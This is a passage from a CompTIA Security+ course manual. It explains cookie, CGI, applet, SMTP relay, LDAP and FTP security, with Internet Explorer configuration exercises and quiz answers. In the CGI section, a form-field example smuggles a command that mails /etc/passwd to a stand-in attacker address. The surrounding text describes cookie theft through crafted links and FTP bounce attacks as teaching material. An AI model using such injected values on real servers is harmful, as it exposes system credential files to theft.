Cookies serve a variety of functions, from personalizing Web pages based on user preferences to keeping the state of a users shopping cart on an online store. Most Webbased authentication models are engineered to utilize cookies for verification of a users session. Cookies have been designed to enhance the browsing experience of a typical user. Cookies are stored on a users hard drive and can be accessed by a users Web browser. The files contain saved login information, your address, shopping cart status, and a host of other things that can make the Web browsing experience more convenient. In Windows 2000/Server 2003 and XP, these cookie files are stored in the Documents and Settings folder for each user of the computer (the user profile). Vulnerabilities Cookies contain tools that are easily exploited by hackers and some so-called legitimate services to provide information about users without consent. Hackers often target cookies as a means of gaining illegal access to user accounts. Cookies can also be utilized to track information, such as the browsing habits of users, which might then be sold to an advertisement company that targets the user with unwanted ads. Its extremely crucial for Web site owners to design security measures to handle Web-based cookies in order to protect their user base and the sensitive data stored on their servers. Pages that can use a servers cookies are limited to that particular server, or to a domain hosting the server. An attacker could obtain a victims cookie for a given service by generating a script that must execute within a page from that same domain or server. One can accomplish this by a process known as Error Handling Exception (EHE). An attacker can execute a code on the server that generates an error message that is returned to the user. The attacker can then exploit the insecure error notification to launch an attack on the target server. This is possible by manipulating the error messages that are returned from 404 requests (404 File Error) or from elements that are echoed back to the screen unescaped.
If students are unfamiliar with HTML coding, explain that the <A> tag is the anchor element used in hyperlinks.
Its not possible for an attacker to obtain a given cookie directly from a victims computer. The attacker must convince a user to follow a malicious hyperlink to the targeted server so the cookie can be obtained through the error handling process on the server. For example, the attacker could send an e-mail (containing a link to the server) to an HTML-enabled e-mail client. More specifically, a hacker can manufacture a hyperlink and hide the malicious script behind the desired text of the <A> tag. When the innocent user activates the link, the malicious script embedded in the link can trigger the server to send the cookie to the attacker. One of the limiting factors of this type of attack is that the user must be logged on to the service during the time the attack takes place. If, for instance, the innocent user is not logged on to his Hotmail account (HTML-enabled service), the attacker cannot use this technique to launch the attack.
Web security Safeguards
621
The following policies will help protect your organization against cookie exploits: Disable the use of cookies by reviewing your browsers preferences and options. You can also specify that you be prompted before a site puts a cookie on your hard disk, so you can choose to allow or disallow the cookie. Notice that disabling cookies will make some Web pages inoperable. Do not use cookies to store sensitive information. If you must store confidential information in cookies, use SSL/TLS to prevent the information from being exploited by a hacker. Do it!
B-2:
Discussing buffer overflow and cookie vulnerabilities

1 Buffer overflow attacks perform which of the following task(s)? (Choose all that apply.) A
B C
Monitor a browsers activities. Send enough data to overfill the buffer of a given field within an application. Force an application to execute commands on behalf of the attacker. Embed malicious macros.
2 What are the prerequisites for executing a buffer overflow? (Choose all that apply.)
A
The attacker must modify the necessary parameters to point to the embedded code. The attacker must log in as the system administrator of the Web server. The attacker must launch the attack while the user is logged onto the service. The attack must place the necessary code to execute the attack in the victims buffer.
B
C D
3 A hacker can exploit cookies to gain illegal access to user accounts and track the browsing habits of users. True or false?
True
4 Hackers can only gain access to a cookie if the user logs on to the targeted service at the same time the attack takes place. True or false?
True
622
Java applets
Explanation Java applets are Internet applications (written in Java programming language) that can operate on most client hardware and software platforms. Applets are typically stored on Web servers, from which they can be downloaded onto clients when accessed for the first time. When subsequently accessing the server, the applet is already cached on the client and, therefore, can be executed with no download delay. Signed and unsigned applets Distribution of software over networks poses potential security problems because the software must pass through many intermediate devices before it reaches the users computer. Software, unless downloaded from a trusted party, poses significant risks for an individual users computer and data. The user often has no reliable way of confirming the source of downloaded software code or whether it was changed in transit over the network. Signing applets is a technique of adding a digital signature to an applet to prove that it came unaltered from a particular trusted source. The application generates a private/public key pair and obtains a certificate authenticating the signer. The application then signs the applet code. Users downloading the applet can check the signature to verify the source of the code. Signed applets can be given more privileges than ordinary applets. An unsigned applet operates subject to a set of restrictions called the sandbox model. Sandbox restrictions prevent the applet from performing certain operations on local system resources (for example, deleting files or modifying system information such as registry settings and other control panel functions). Signed applets do not have such restrictions. Unsigned applets typically display warning messages, such as the ones shown in Exhibit 6-2.
Exhibit 6-2: Unsigned applet warning message The user of the system on which the applet will be running decides what kind of access privileges should be granted to the signer of the applet. Commonly used browsers, such as Netscape and Microsoft Internet Explorer keep track of these privileges. Depending on the applets privileges, such browsers can grant access to system resources without interrupting the user. If the applet is new and has not established a trust relationship with the clients system, the browser displays a security message confirming the consent of the client, as shown in Exhibit 6-3.
Web security
623
Exhibit 6-3: Security message confirming consent Digitally signing an applet is a confirmation from the owner of the applet about its legitimate purpose. The final decision about whether the applet should have access to system resources always rest with the client. If a signed applet damages a certain system intentionally or unintentionally, the applet can be traced back to its source from its signature. Two reasons for using code signing features are: To release the application from the sandbox restrictions imposed on unsigned code To provide confirmation regarding the source of the applications code The Java Development Kit ( 1.1 and later) Security Manager is aware of signatures, and, working in conjunction with the Java key tool (which is used to sign code and specify who is trusted), grants special privileges to signed and trusted applet code.
624
CGI
The Common Gateway Interface (CGI) is a programming interface that allows Web servers to perform data manipulation and interact with users. For example, CGI scripts perform data input, and search and retrieval functions on databases. CGI was created to extend the HTTP protocol. There are typically two parts to a CGI script: an executable program on the server (the script itself), and an HTML page that feeds input to the executable. The executable can be in the form of Perl scripts, shell scripts, or compiled programs. CGI scripts can sometimes be used without user input to perform tasks such as incrementing page counters and displaying the date and time. The following steps and Exhibit 6-4 represent a typical form submission that takes place on the Internet: 1 The user/client retrieves a form (an HTML-formatted page) from a server via a browser. 2 The user fills out the form by inputting data into the required fields on his or her local machine. 3 After filling out the form, the user submits the data to the server. This typically takes place via the use of a submit button on the form. 4 The submit action performed on the clients browser identifies the corresponding program residing on the server, sends all inputted data, and ignites an execute request to the server. 5 The server executes the requested program.
Exhibit 6-4: Working of a CGI script A similar process takes place for all types of CGI execution. CGI is very efficient because all data manipulation takes place on the server, not the client. The client merely passes data to the server and receives HTML in return. This leaves the server with only the task of executing the request when issued. Vulnerabilities The interactive nature of CGI also leads to security loopholes that need to be addressed by system administrators and software developers. CGI accepts input from a page on a client system (typically an HTML page downloaded in the browser), but executes the request on the server. Allowing input from other systems to a program that runs on a local server exposes the system to potential security hazards. Because the HTML form has been transferred to the client, a malicious user can modify or add parameters to the HTML form, instructing the server to do tasks outside the intended purpose of the form.
Web security For instance, a malicious user can modify the following instruction:
625
<INPUT TYPE="radio" NAME="send_to" VALUE="systemadmin@example. com">System Admin<br>
This instruction is supposed to generate an e-mail to a system administrator with the following line:
<INPUT TYPE="radio" NAME="send_to" VALUE="systemadmin@example. com;mail malicioususer@attack.com /etc/passwd"> SystemAdmin<br >
This line then sends an e-mail containing the UNIX password file to the attacker. Using such techniques, an attacker can gain access to confidential files and systems files or install malicious programs and viruses. Safeguards It is extremely important to take precautions when running scripts on the Web server. Here are some possible precautions to take: Deploy intrusion detection systems (IDS), access list filtering and screening. Design and code applications to check the size and content of the input received from the clients. Create different user groups with different permissions and restrict access to the hierarchical file system based on those groups. Validate the security of a prewritten script before deploying it in your production environment. The biggest security risk of CGI scripts is not to the client where the Web browser resides, but to the server where the script resides. CGI scripts must be carefully scrutinized before allowing them to be placed on a Web server.
626
Do it!
B-3:
Reviewing signed applet and CGI vulnerabilities

1 A(n) unsigned applet operates subject to a set of restrictions called the _________________________.
Sandbox model
2 New applets require the consent of the client to install. True or false?
True
3 __________________ is a programming interface that allows Web servers to perform data manipulation and interact with users.
CGI
4 Which of the following can perform the CGI scripts tasks? (Choose all that apply.)
A
Search for information Embed malicious macros in a document Collect client data using forms Mail password files to an attacker
B
C D
5 List two precautions that you should take when running CGI scripts.
Deploy intrusion detection systems (IDS), access list filtering and screening on the
border of the network. clients.
Design and code applications to check the size and content of the input received from the Create different user groups with different permissions and restrict access to the
hierarchical file system based on those groups. environment.
Validate the security of a prewritten script before deploying it in your production
Web security
627
SMTP relay
Explanation Simple Mail Transfer Protocol (SMTP) is the standard Internet protocol for global email communications. A mail client (user) communicates with the mail server using the SMTP protocols TCP port 25 to get e-mail from one place to another. Current versions of SMTP support ASCII and MIME content. With its high utilization across the Internet, SMTP is intentionally designed as a very simple protocol. This also makes it easy to understand and troubleshoot; unfortunately, malicious users can easily exploit this simple design in many ways across the Internet. SMTP spams Third-party SMTP relay is used to transfer messages from one server to another via SMTP. A malicious user could exploit this basic concept and try to hide the real origin of a message by using another server as an SMTP relay. In such a scenario, the attacker can use the relay Internet Mail Service as an agent for unsolicited commercial e-mail (spam), flooding innocent users mailboxes with many copies of the same message. Spam is an attempt to force messages on people who would not otherwise choose to receive them. Before you can understand how spamming is achieved via SMTP relay, its important to understand how SMTP functions. The following code demonstrates the sending of an email message with a programming interface as opposed to using a user-friendly e-mail client such as Eudora. You can actually accomplish this by connecting to TCP port 25 of the SMTP server and executing these commands.
HELO mail.example.com 250 mail.anotherexample.com Hello mail.example.com [172.16.35.44], pleased to meet you MAIL FROM: person1@example.com 250 person1@example.com Sender ok RCPT TO: person2@anotherexample.com 250 person2@anotherexample.com Recipient OK DATA 354 Enter mail, end with "." on a line by itself From: To: 250 OAA08757 Message accepted for delivery
This transaction takes place between two SMTP servers. The sending server executes the bold lines; the nonbold lines are responses from the receiving server. The sending server introduces itself as example.com. The receiving server serves the anotherexample.com domain. MAIL FROM: and RCPT TO: fields indicate the source and the destination of the message. These fields (up until the DATA field) make up the envelope of the message. The DATA field comprises of the body of the message as well as the header fields. The key point is that the only variable needed to deliver the message is the RCPT TO:; a malicious user can forge other variables.
628
CompTIA Security+ Certification Its important to identify the real origin of a spam mail in order to take the necessary action. An e-mail message typically traverses through at least two SMTP servers (the senders and the receivers SMTP servers) before reaching the destination client. As messages voyage to their destination, they get stamped by the intermediate SMTP servers along the way. The stamps generate useful tracking information that can be observed in the mail headers. Careful examination of these mail headers can go a long way in identifying the real source of spam mail. The following text is a typical Received: header from an e-mail message:
From forged-address@example.com Received: from example.com ([172.16.35.44]) by mail.anotherexa mple.com (8.8.5) for <receiver@anotherexample.com>
Although such messages do not issue any alarms per se, careful examination of these messages could unveil mismatches between the IP addresses and the domain names indicated in the header. You could verify this by executing a reverse DNS lookup to find out the domain name that corresponds to the indicated IP address. For instance, in the Received: header above, reverse DNS lookup could reveal that the IP address (172.16.35.44) does not really correspond to the example.com domain. In fact, most modern mail programs have already incorporated this functionality, which generates a Received: header that includes the identity of the attacker. Spam via SMTP relay can lead to loss of bandwidth and hijacked mail servers that might no longer be able to serve their legitimate purpose. Furthermore, mail servers of innocent organizations can be subject to blacklisting due to problems caused by SMTP relay. This might in turn prevent an organization from communicating with other organizations. There are institutions, such as the Open Relay Behavior-Modification System (ORBS) and Mail Abuse Prevention System (MAPS), which provide reporting, cataloging, and testing of e-mail servers configured for SMTP relay. These institutions maintain Realtime Blackhole Lists (RBL) of mail servers with problematic histories. Being blacklisted by these types of organizations can adversely affect a businesss operations. Safeguards Companies might configure their systems so that any mail coming from the blacklisted mail servers are automatically rejected.
Web security Do it!
629
B-4:
Understanding SMTP relay vulnerabilities

1 SMTP is an Internet e-mail service and uses TCP port 25. True or false?
True
2 It is possible to forge the MAIL FROM: variable within an SMTP message. True or False?
True
3 Describe some of the problems with spam via SMTP relay.

Spam via SMTP relay can lead to a loss of bandwidth and hijacked mail servers that might no longer be able to serve their legitimate purpose. Furthermore, mail servers of innocent organizations can be subject to blacklisting due to problems caused by SMTP relay. This might in turn prevent an organization from communicating with other organizations. If you are blacklisted, your business operations can be adversely affected. Your e-mail might be automatically rejected by other organizations that configure their systems based on the blacklisted mail servers.
630
Topic C: Configuring Internet Explorer security

Explanation Most large companies have advanced firewalls and proxy services that allow them to filter or block certain content addressed to employee desktops. This is a necessary feature, but its not always practical, especially for small- to mid-sized companies, but fortunately Microsoft has built-in security features available for users of Internet Explorer.
Exhibit 6-5: Internet Options dialog box with the Security tab activated. Do it!
C-1:
Configuring and discussing security Heres why

Youll configure Trusted Sites in Microsoft Internet Explorer 6.
Heres how
1 Switch to Internet Explorer 2 Choose Tools, Internet
Options
3 Activate the Security tab 4 Select Trusted Sites
As shown in Exhibit 6-5.
Web security 5 Click Default Level
631
To set the security level for the zone to Medium. If it is already set to Medium, the Default Level button will be dimmed.
6 Click Sites 7 Add the following Web site to the zone:

www.course.com
8 Click Close 9 Select Restricted Sites 10 Click Sites Add the following Web sites to the zone:
www.kazaa.com ftp.microsoft.com To configure Restricted Sites to block file downloads in Microsoft Internet Explorer 6.
11 Click Close 12 Click OK 13 In the Internet Explorer Address box, enter www.kazaa.com 14 Enter ftp.microsoft.com Navigate to /Reskit/win2000 15 Right-click ADSizer.exe Select Copy to Folder
A security alert appears. URLs can be redirected, so this is not the best way to block file downloads. To close the Internet Options Window. Notice the Restricted sites icon in the lower right corner of the browser. Kazaa completely fails to load. In the browser's Address field.
Click OK 16 Close the browser
To close the alert.
632
Do it!
C-2:
Reviewing trusted sites

1 Which of the following is a zone that contains all Web sites that have not been placed in other zones?
A
Internet Local intranet Trusted sites Restricted sites
B C D
2 Which of the following is a zone that contains Web sites that could potentially cause damage to your system? (Choose all that apply.) A B
C D
3 Which of the following is a zone that contains Web sites that you believe will not cause damage to your system? A B
C
Web security
633
Privacy settings
Explanation One issue many users have with Web browsing is the fact that anyone on the Internet has the ability to write information to their computers hard drive. One example of this ability is the use of cookies. Cookies can be valuable to both the user and the company that deposits them. For example, if you go to an e-commerce site and fill out a form with all your important data, a cookie can be used to remember you. This is helpful because youll not have to enter the data every time you visit the site. While this capability can be very helpful, it can also be a major security risk. With that cookie on your computer, anyone with access to your computer could go to the e-commerce site and purchase goods without your knowledge.
Exhibit 6-6: The Internet Explorer Privacy settings tab
634
Exhibit 6-7: Overriding Privacy settings with Per Site Privacy Actions to allow cookies to a selected site Do it!
C-3:
Configuring and discussing privacy settings Heres why

Youll configure Microsoft Internet Explorer 6 Privacy settings. The Internet Options window appears.
Heres how
1 Launch Internet Explorer 2 Choose Tools, Internet
Options
3 Activate the Privacy tab Slide the Settings bar up to High 4 Click Edit 5 In the Address of Web Site box, type www.yahoo.com 6 Click Allow Click OK 7 Click OK
Notice that only the domain is added to the Managed Web sites list. To block cookies that do not comply with the W3C P3P. To add Web sites you want to allow to bypass the settings.
Web security 8 In the Address box of your browser, enter www.msn.com 9 In the Privacy message, click OK Double-click the cookie privacy warning in the toolbar
635
A report displays, similar to the one shown below:
10 Click Close 11 In the Internet Explorer Address box, enter www.yahoo.com 12 Choose Tools, Internet
Options Notice the privacy warning is absent.
13 Activate the Privacy tab 14 Click Default Click Apply
Youll reset the privacy settings.
To return to the medium setting.
636
Do it!
C-4:
Reviewing cookies

1 A cookie is a small text file that stores information that can be used by a server. True or false?
True
2 Which of the following Privacy settings will block all cookies without a Compact Privacy Policy? A
B
Block all cookies High Medium high Accept all cookies
C D
3 Which of the following Privacy settings is likely to cause some Web pages to fail to load? (Choose all that apply.)
A B C D
Block all cookies High Medium high Medium Low Accept all cookies
E F
Web security
637
Advanced security settings

Explanation In addition to cookies, Internet Explorer can store information about your Web browsing habits by caching. This can be a problem in areas that requires a high level security. Most users are aware of Temporary Internet Files and how to remove them. Temporary Internet Files are used as a local cache to increase the speed of Web browsing, but the files can also be used to track your path on the Web. Usernames and passwords can also be stored to save you time, but this might allow for unauthorized access to resources. These issues can be resolved by using Internet Explorers Advanced Security Settings.
Exhibit 6-8: Advanced Internet security options
638
Do it!
C-5:
Configuring and discussing advanced security settings Heres why
Heres how
1 Activate the Advanced tab Scroll down to the Security section and review the settings 2 Activate the Content tab 3 Click AutoComplete Clear Usernames and
passwords on forms
(As shown in Exhibit 6-8.)
4 Click OK 5 Click OK 6 Close all open windows
To close the AutoComplete Settings window. To close the Internet Options window.
Web security Do it!
639
C-6:
Reviewing advanced security settings

1 If you wish to prevent secure files from being stored in Temporary Internet Files you can check which of the following Security options? A
B
Do not save encrypted file to disk Empty Temporary Internet Files folder when browser is closed Use Fortezza Do not save Certificates to disk
C D
2 When you enable the option Empty Temporary Internet Files folder when your browser is closed, it also deletes all cookies. True or false?
False: It does not affect the cookies.
640
Unit summary: Web security

Topic A In this topic, you learned the fundamentals of SSL/TLS and HTTPS protocols and their implementation on the Internet. You learned that the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) are commonly used protocols for managing the security of a message transmitted across the insecure Internet. In this topic, you learned the basics of how JavaScript, buffer overflow, ActiveX, cookies, CGI, applets, and SMTP relay work, and how they are commonly exploited by hackers. In this topic, you learned how to configure Microsoft Internet Explorer to block cookies and file downloads and set privacy setting. You also learned how to configure advanced security settings.
Topic B
Topic C
Review questions
1 Signing applets is a technique of adding a _________ __________ to an applet to prove that it came unaltered from a particular trusted source.
digital signature
Sandbox restrictions might prevent the applet from performing required operations on local system resources. True or false?
True
In order to use SSL security in a Web page transaction, what must be used in the Web page URL?
HTTPS
A time stamp is a typical component found on a typical certificate. True or false?

True
__________________ is an interface specification that allows communications between client programs and Web servers.
CGI
71
Unit 7 Directory and file transfer services

A Describe LDAP directory services. B Identify the major vulnerabilities of the
FTP method of exchanging data and identify countermeasures.

C Describe the threat posed to your network
by unmonitored file sharing.
72
Topic A: Introduction to directory services

# 2.4 Objective Recognize and understand the administration of the following directory security concepts LDAP (Lightweight Directory Access Protocol)
Directory services
Explanation A directory service provides a database for inventory and administration of every object on the network. The directory service performs the following functions: Records and organizes information about every user account, server, printer, workstation, and file system on the network. Grants users access to applications, files, printers, and other network services anywhere on the network with a single login sequence. Enables the LAN Administrator to track the location and disposition of all network resources. Information gathered for each network resource is stored as an object in the database. Users can query the database using a broad set of criteria (such as name, type of service, or location).
LDAP
Lightweight Directory Access Protocol (LDAP) is a commonly used directory service protocol created by the Internet Engineering Task Force (IETF). It was originally designed to work as a front-end client for X.500 directory services (an ISO and ITU standard that defines how global directories should be structured). X.500 requires the full OSI protocol stack and significant computer resources to operate. In response, LDAP was redesigned as a stripped-down version of X.500. LDAP offers the following features: Hierarchical database structure follows X.500 standards Extensible for use with any X.500-compatible database Provides authentication and authorization services Easily deploys on any client or server Runs over TCP/IP networks Supports most operating systems (platform-independent) LDAPs key advantage is that its a versatile directory system that is standards-based and platform-independent. This has caused LDAP to proliferate to nearly all operating systems and has caused the protocol to be widely adopted for a variety of networking applications (see the following table for a sample of major players in the LDAP market). This protocol runs on TCP/IP, so it can be deployed on most networks.

Vendor Microsoft Sun IBM Novell MessagingDirect Opensource Product Active Directory ONE Integration Server (formerly Netscape iPlanet) Directory Server eDirectory M-Vault OpenLDAP
73
Authentication and authorization

As more and more applications have been deployed on the network to support critical business functions, there has been an increasing need to authenticate users to secure those applications. Todays networks typically have a host of operating systems and a matching number of different applications. LDAP synchronizes usernames and passwords across operating platforms and applications, enabling access to network resources with a single login sequence. A few common applications of LDAP include: Single sign-on (SSO) SSO is an authentication process in a client/server environment where a user can enter a single username and password and obtain access to more than one application or network resource. User administration A major problem for enterprises is the costly task (in terms of system administrator time) of maintaining user accounts. Maintenance activities include the creation and deletion of accounts, as well as adding and removing user privileges (such as when a user moves to another department). LDAPs flexibility simplifies this process because administrators have only one user database to manage, and it handles authentication and authorization for all major applications. Public key infrastructure (PKI) PKI is a system for creating and managing certificates used for authentication and encryption. A basic requirement for PKI is the maintenance of user certificates, which is often accomplished using LDAP. A user certificate contains a users public key together with additional identifying data. This certificate is created and authenticated by a certificate authority (CA) that guarantees the certificate is valid (the users identity has been validated), provided it has not been revoked. Most CAs support the delivery of certificates to LDAP-based directory systems.
74
LDAP framework
An LDAP directory follows the X.500 hierarchical tree format as shown in Exhibit 7-1. The diagram portrays an inverted tree, with its root at the top and branches extending out from the root. The branches are classified as containers since their sole purpose is to hold or contain other objects. The most elemental units are called leaf objects. Each leaf on the tree describes a single network resource, such as a computer, printer, user, or file system directory.
Exhibit 7-1: Directory information tree
Directory and file transfer services The following table describes each level of the tree structure:
Level [Root] Description
75
At the top of this inverted tree is the [Root]. Like the root of the file directory tree, this is the highest level you can go within the LDAP structure. The [Root] is created during installation of the first LDAP server on the network and cannot be moved, deleted, or renamed. The Directory tree can have only one [Root]. The Country object, an optional object representing the country of the network, is positioned directly beneath the [Root] object. The next level contains an object called the Organization. The Organization is classified as a container, since its sole purpose is to hold or contain other objects. Organizations typically represent a company or department and are used to store other objects. Every tree must have at least one Organization. Beneath the Organization is another container called the Organizational Unit. Organizational Units typically represent a division, department, workgroup, or project team, and can contain other Organizational Units or leaf objects. Organizational Units are optional in the LDAP hierarchy. Leaf objects are the most elemental unit in the LDAP tree. Each leaf on the tree describes a single network resource. The Directory tree represents each leaf object with an icon that shows what type of resource it is and how it is named.
Country Organization
Organizational Unit
Leaf Objects
Each entry in the directory has a distinguished name (DN) and its own attributes followed by specific values. Each distinguished name must be unique throughout the LDAP directory because it identifies a single network object. An example of the DN of an entry (an individual) stored in a LDAP directory is:
cn=Jonathan Q Public, ou=Information Security Department, o=XYZ Corp, c=United States
Using the following table you can decode the fields in the DN. Jonathan Q Public is the common name of the individual who works in the Information Security Department of XYZ Corp., which is headquartered in the United States.
Abbreviation DN CN OU O C Description Distinguished name Common name Organizational unit Organization Country
76
LDAP security benefits

Some key benefits of LDAP is that it provides authentication of users to ensure their identities, authorization services to determine which network resources the user might access, and finally, encryption for secure communications. LDAP offers encryption by utilizing other protocols through a standards-based interface called Simple Authentication and Security Layer (SASL). Authentication To access the LDAP directory service, the LDAP client must authenticate itself to the LDAP. LDAP then uses the bind operation to provide authentication services when the client attempts to establish a connection with a server. Three levels of authentication are provided by LDAP: No authentication This mode is used if the directory is publicly published information and there is no need to restrict access. An example of such a directory might be the business white pages that list the telephone numbers of all businesses in the Phoenix metropolitan area. Simple authentication Simple mode passes the authentication information across the network in clear text. This clear security risk can be mitigated if encryption is provided by a lower-level protocol such as IPSec. SASL This standards-based scheme launches one of several security methods to add encryption to connection-oriented protocols. SASL leverages a variety of methods including TLS and IPSec. When LDAP authentication is used in SASL mode, any method of encryption included in the SASL framework might be used to secure the user authentication operation. TLS/SSL is the most commonly used method with LDAP 3. Authorization After a client has been authenticated and his or her identity has been established, the LDAP server can determine what resources, applications, and services the user is permitted to access. This is called authorization, or access control, and is determined by access control lists (ACLs). For example, ACLs can be entries that state whether a given user has permission to read, write, add, or delete when accessing specific resources. There are no standards for implementing ACLs; each vendor of LDAP products implements ACLs in its own way. Encryption As was noted in the discussion of SASL, most LDAP servers allow their services to be accessed via TLS and SSL. Generally, secure LDAP (LDAPS) servers use port 636 as a standard SSL/TLS socket number. Directory servers can also support custom sockets, but to do so, the client has to identify the appropriate socket to access the directory services on the server through SSL.
77
LDAP security vulnerabilities

Like any directory service, LDAP is a prime target for attacks and tampering. As a consolidated and unified source of user authentication information (as is the case when an entire enterprise becomes directory enabled), the LDAP server represents a much more valuable and hence risk-prone asset compared to other directory servers. This is because user information previously might have been stored in a variety of locations on the network, and each location allowed access to only a subset of network resources. When that information is all brought together in one place, its easier to securebut the penalties for failing to secure it properly are much higher because a successful attacker can do much more damage. The following are some major types of attacks LDAP servers must be secured against: Denial of service Attacks against an enterprises directory server can have massive ramifications. Mission-critical applications that rely upon the LDAP server for authentication might become unavailable until service is restored. Man-in-the-middle By tricking a client into authenticating to a bogus server, an attacker can gather valuable account information or feed the client false data. Attacks against data confidentiality The directory information contained in the LDAP server is extremely important, so efforts to ensure the directory is confidential are critical. Even if LDAP network traffic is encrypted, there are a multitude of attacks and exploits that an attacker can use to gain access to an LDAP server and the data it contains.
Countermeasures
Extra steps must be taken to secure the LDAP server, including: Apply the latest operating system and application security patches. Remove unneeded services and applications that could potentially present an exploitable vulnerability. Configure strong authentication using Kerberos for LDAP v2 or SASL for LDAP v3. Block LDAP (typically, TCP/UDP ports 389 and 636) at the firewall.
78
Do it!
A-1:
Understanding directory services

1 Information gathered for each network resource is stored as a(n) _________ in the database. A
B
leaf object container query
C D
2 Name three functions that a directory service performs.

Records and organizes information about every user account, server, printer,
workstation, and file system on the network.
Grants users access to applications, files, printers, and other network services anywhere
on the network with a single login sequence. resources.
Enables the LAN Administrator to track the location and disposition of all network
3 LDAP stands for _________________________________.

Lightweight Directory Access Protocol
4 Name two similarities between X.500 and LDAP.

Both use the same hierarchical database structure and standards. Both provide authentication and authorization services. Both are platform-independent.
5 Name two differences between X.500 and LDAP.

LDAP runs on TCP/IP; X.500 requires the full OSI protocol stack. LDAP requires much less computer resources. LDAP is easier to install than X.500.
6 Provide the distinguished name for the following leaf object: Company: Emerald Consulting Department: Information Services Volume: UNIX401_SYSTEM
cn= UNIX401_SYSTEM, ou=Information Services, o=Emerald Consulting
7 SSO is an authentication process in a client/server environment where a user can enter a single username and password and obtain access to more than one application or network resource. True or false?
True
Directory and file transfer services 8 What are some major types of attacks LDAP servers must be secured against? (Choose all that apply.)
A B C
79
Man-in-the-middle Denial of service Attacks against data confidentiality Encryption
710
Topic B: File transfer services

# 2.5 Objective Recognize and understand the administration of the following file transfer protocols and concepts S/FTP (File Transfer Protocol) Blind FTP (File Transfer protocol) / Anonymous Vulnerabilities Packet Sniffing
FTP
Explanation It is obvious to most people who have downloaded files over the Internet that the ability to share programs and data with other people around the world is an essential aspect of the Internet that continues to drive its explosive growth. This is why file transfer is so critical to todays networked organizations. An often-overlooked aspect of this is the security and integrity of the typically secret data that businesses need to exchange over the Internet. As incredible and wonderful as the Internet might be, its a wild and uncontrolled network and poses a number of risks to your businesss data. One of the most commonly used application protocols on the Internet is File Transfer Protocol (FTP). Its also one of the most insecure services in use. The reason it is so commonly used is that most FTP clients and servers are free, distributed with most operating systems, and relatively easy to use. System administrators can easily exchange files with remote offices and business partners over the Internet by setting up an FTP server in a matter of minutes and with no additional cost. The list of vulnerabilities and attacks associated with FTP is a long one. FTP was one of the early TCP/IP applications and was designed without the security features of many current applications. To understand FTPs inherent flaws, one must first understand the mechanism by which FTP authenticates and transfers data between a client and a server. FTP has two standard data transmission methods: active FTP and passive FTP. The terms active and passive refer to the servers roll in setting up the TCP session, as shown in Exhibit 7-2.
Exhibit 7-2: Setup of the FTP command connection
711
In both active and passive FTP, the client initiates a TCP session using destination port 21 to the server. This is the command connection and is used for authenticating the user and transferring commands between the client and the server. The command connection operates just as a normal TCP session should: the client initiates a session using a predetermined destination port number on the server (for FTP, this is port 21), and a source port that is a number greater than 1023. The differences in how the two types of FTP operate are in the data connection that is set up when the user wants to transfer data between the two machines. For example, if the user issued FTPs GET command to download a file (the command might take the form get resume.doc to download the file resume.doc), the client sends the get command using the command connection, and then the server negotiates the opening of a second TCP connection to actually transfer the files data. Active FTP In active FTP, which is FTPs default operation, the FTP server creates a data connection by opening a TCP session using a source port of 20 and a destination port greater than 1023. This is contrary to TCPs normal operation in which the destination port of a new session is fixed and the source port is a random high port above 1023. Active FTP is an issue because securitys best practices dictate that connections can be initiated outbound from a trusted network to an untrusted network, but not vice versa. In a situation in which the client sits behind a firewall of an internal trusted network and the server is out on the Internet, active FTP breaks this policy. Active FTP requires that the server initiate a connection inbound to the client to transfer data, as shown in Exhibit 7-3.
Exhibit 7-3: Setup of active FTP data connection Most modern stateful firewalls accommodate this issue by actually watching the negotiation between the client and server and automatically opening the agreed upon port so the client can receive the connection from the server. Simple packet-filtering firewalls do not have this level of intelligence. To permit active FTP using packetfiltering firewalls, one must allow all high ports (because one never knows what port will be negotiated by the client and server) to reach internal clients from outside the trusted networka very dangerous proposition. The situation can be slightly mitigated by only allowing incoming connections from port 20. People seeking to exploit this weakness could easily craft packets from that port as well.
712
CompTIA Security+ Certification Passive FTP In passive FTP, which is not supported by all FTP implementations, the client initiates the data connection to the server (therefore, the server is said to be passive because its only accepting a connection instead of originating one). As shown in Exhibit 7-4, the passive FTP client initiates the data connection to the server with a source and destination port that are both random high ports.
Exhibit 7-4: Setup of the passive FTP data connection This solves the firewall issue just mentioned, because the client initiates both connections, so the client does not violate his own security policy by allowing an inbound connection from the Internet. This opens up a security issue for the FTP server: now the server must allow inbound connections on all high ports in order to accommodate passive FTP data connections. Most stateful firewalls accommodate this by monitoring the control connection to determine which port is used for the data connection, and then opening that single port between the server and the client. The same issue exists for packet-filtering firewalls which are not equipped to look that deeply into the FTP packet; a packet-filtering firewall that is protecting the active FTP server has to be configured to accept all ports to the server in order to accommodate passive FTP.
FTP security issues

Some of the better-known FTP security issues are outlined in the following sections. Bounce attack The Bounce attack uses the fact that RFC 959, the standards document outlining FTP, gives the active FTP client the power to cause the FTP server to open a data connection to any IP address on any port. This can be used to anonymously attack other systems on the Internet. RFC 2577, FTP Security Considerations, outlines an example of such an attack. For instance, a client uploads a file containing SMTP commands to an FTP server. Then, using an appropriate PORT command, the client instructs the server to open a connection to a third machines SMTP port. Finally, the client instructs the server to transfer the uploaded file containing SMTP commands to the third machine. This might allow the client to forge mail on the third machine without making a direct connection, and makes it difficult to track attackers.
Directory and file transfer services Clear text authentication and data transmission
713
Another vulnerability lies in the fact that FTP traffic is sent unencrypted in clear text. This includes both the username/password pair and the data itself. Anyone with a packet sniffer can own a copy of the data transferred via FTP, as well as the login information used to obtain it. Glob vulnerability A nonstandard issue with many FTP implementations is that they permit the client to use the (*) wildcard in FTP commands. The wildcard is a very useful tool that allows a user to perform an operation on multiple files at once. For example, the command del ap* causes the files application.doc and apple.pic to be deleted. Hackers can exploit this behavior to create buffer overflows and therefore gain control of the server. This is called the glob vulnerability. Software exploits and buffer overflow vulnerabilities There are many known vulnerabilities associated with various implementations of FTP. For example, a well-documented buffer overflow vulnerability in wu-ftp (a common FTP server implementation) has been responsible for thousands of compromised UNIX and Linux boxes. Anonymous FTP and blind FTP access The practice of setting up anonymous FTP servers across the Internet is extremely common. This originates with an FTP servers default position of allowing anyone authenticating with the username anonymous and any password (good Netizens use their e-mail address as a password) access to a directory on the server. This practice allowed people around the world to easily share data and files with the world without too much overhead or red tape. Many software vendors set up anonymous FTP sites to distribute updates and patches for their products. FTP search engines exist that make finding thousands of anonymous FTP sites quick and easy. The transcript below is from an anonymous FTP session. Information entered by the user appears in bold typeface:
